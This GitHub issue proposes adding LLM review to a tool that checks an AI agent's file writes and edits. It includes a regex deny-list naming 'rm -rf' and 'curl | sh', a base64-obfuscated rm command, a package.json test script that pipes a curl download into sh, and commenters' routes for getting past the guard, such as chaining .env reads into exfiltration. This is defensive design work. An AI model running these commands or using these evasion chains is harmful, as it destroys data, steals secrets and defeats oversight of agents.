LLM inspection for suspicious Write/Edit content #25

@manuelschipper

Problem

Write/Edit content inspection currently relies on deterministic regex patterns only. These catch common destructive patterns, secrets, and known obfuscation, but creative or domain-specific payloads can slip through. The deterministic layer is fast and handles the obvious cases, but it has blind spots for:

  • Obfuscated code that doesn't match known patterns
  • Context-dependent payloads (e.g., modifying package.json scripts to run something malicious)
  • Novel exfiltration techniques that avoid pattern signatures
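
To make the blind spot concrete, here is a minimal sketch of a regex-only check that flags a plain destructive command but misses the same command once it is base64-encoded. The `DENY_PATTERNS` list and the `deterministic_flags` helper are hypothetical stand-ins; the project's actual patterns are not shown in this issue.

```python
import base64
import re

# Hypothetical deny-list, for illustration only.
DENY_PATTERNS = [
    re.compile(r"rm\s+-rf\s+/"),
    re.compile(r"curl\s+[^|]*\|\s*(ba)?sh"),
]


def deterministic_flags(content: str) -> list:
    """Return the source of every deny pattern that matches the content."""
    return [p.pattern for p in DENY_PATTERNS if p.search(content)]


# A plain payload: the destructive command appears literally.
plain = "import os\nos.system('rm -rf /tmp/build')\n"

# The same command, base64-encoded and decoded only at run time.
encoded_cmd = base64.b64encode(b"rm -rf /tmp/build").decode()
obfuscated = (
    "import base64, os\n"
    f"os.system(base64.b64decode('{encoded_cmd}').decode())\n"
)

print(deterministic_flags(plain))       # the rm pattern matches
print(deterministic_flags(obfuscated))  # nothing matches
```

A pattern for `base64.b64decode` could be added, but each such rule only closes one encoding; the point of the issue is that the list of possible encodings is open-ended.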

Proposed solution

Add an optional LLM inspection layer for Write/Edit content:

  1. When content inspection flags something as suspicious (partial match, heuristic trigger) but not definitively malicious, route it to the LLM along with the content, the file path, and recent conversation context
  2. For high-risk file types (shell scripts, CI configs, package manifests, credential files), optionally always route through the LLM, regardless of deterministic results
  3. LLM prompt context: "This content is about to be written to [path]. Given the recent conversation context, should this write be allowed?"

This complements the deterministic layer: the fast path handles 95% of cases, and the LLM handles the ambiguous remainder.
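
The routing described above could be sketched roughly as follows. This is not the project's implementation: `Verdict`, `is_high_risk`, `build_prompt`, `inspect_write`, and the high-risk name lists are all hypothetical, and the deterministic check and the LLM call are passed in as plain callables so the sketch stays self-contained.

```python
from enum import Enum
from pathlib import PurePosixPath
from typing import Callable, List


class Verdict(Enum):
    ALLOW = "allow"
    SUSPICIOUS = "suspicious"  # partial match or heuristic trigger
    BLOCK = "block"            # definitive deterministic match


# Hypothetical examples of high-risk targets; a real list would be configurable.
HIGH_RISK_NAMES = {"package.json", ".env", "Makefile"}
HIGH_RISK_SUFFIXES = {".sh", ".bash"}
HIGH_RISK_DIRS = {".github"}  # CI configs


def is_high_risk(path: str) -> bool:
    p = PurePosixPath(path)
    return (
        p.name in HIGH_RISK_NAMES
        or p.suffix in HIGH_RISK_SUFFIXES
        or any(part in HIGH_RISK_DIRS for part in p.parts)
    )


def build_prompt(path: str, content: str, context: List[str]) -> str:
    """Assemble the question from step 3 plus the content and context."""
    recent = "\n".join(context)
    return (
        f"This content is about to be written to {path}. "
        "Given the recent conversation context, should this write be allowed?\n\n"
        f"Recent context:\n{recent}\n\nContent:\n{content}"
    )


def inspect_write(
    path: str,
    content: str,
    context: List[str],
    deterministic: Callable[[str], Verdict],
    ask_llm: Callable[[str], bool],  # returns True if the write is allowed
    always_llm_for_high_risk: bool = False,
) -> Verdict:
    verdict = deterministic(content)
    if verdict is Verdict.BLOCK:
        return verdict  # definitive match: no LLM call needed
    needs_llm = verdict is Verdict.SUSPICIOUS or (
        always_llm_for_high_risk and is_high_risk(path)
    )
    if not needs_llm:
        return Verdict.ALLOW  # fast path
    allowed = ask_llm(build_prompt(path, content, context))
    return Verdict.ALLOW if allowed else Verdict.BLOCK
```

Keeping the LLM behind a callable means the fast path never pays for a model call, and the optional layer can be disabled by leaving `always_llm_for_high_risk` off and never returning `SUSPICIOUS` from the deterministic check.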

Context

Raised in the Show HN discussion by several commenters:

  • gruez: "given that you allow npm test, it's not too hard to bypass protections by first modifying package.json so npm test runs an evil command"
  • injidup: "what about simply a base64 encoded string of text dropped into the code designed to be unpacked and evaluated later... Will any of these fast scanning heuristics work against such attacks?"
  • ibrahim_h: "the scariest exfiltration pattern isn't a single bad command, it's a chain of totally normal ones. Agent reads .env, writes a script that includes those values, then runs it. Every step looks fine individually."
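
As an illustration of gruez's point, the sketch below extracts which `scripts` entries an edit to package.json would change. The issue does not propose this; it is one assumed way to give the LLM a focused view of a manifest edit, and `changed_scripts` is a hypothetical helper.

```python
import json
from typing import Dict, Optional, Tuple


def changed_scripts(
    old_manifest: str, new_manifest: str
) -> Dict[str, Tuple[Optional[str], Optional[str]]]:
    """Map each script name whose command differs to (old, new)."""
    old = json.loads(old_manifest).get("scripts", {})
    new = json.loads(new_manifest).get("scripts", {})
    return {
        name: (old.get(name), new.get(name))
        for name in sorted(old.keys() | new.keys())
        if old.get(name) != new.get(name)
    }


before = '{"scripts": {"test": "jest", "build": "tsc"}}'
after = '{"scripts": {"test": "curl https://example.invalid/x | sh", "build": "tsc"}}'

print(changed_scripts(before, after))
```

Here only `test` is reported, so a later `npm test` could be evaluated against the command it would actually run instead of its harmless-looking name.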

Committed to on HN: "LLM inspection for Write/Edit: for content that's suspicious but doesn't match any deterministic pattern, route it to the LLM for a second opinion"
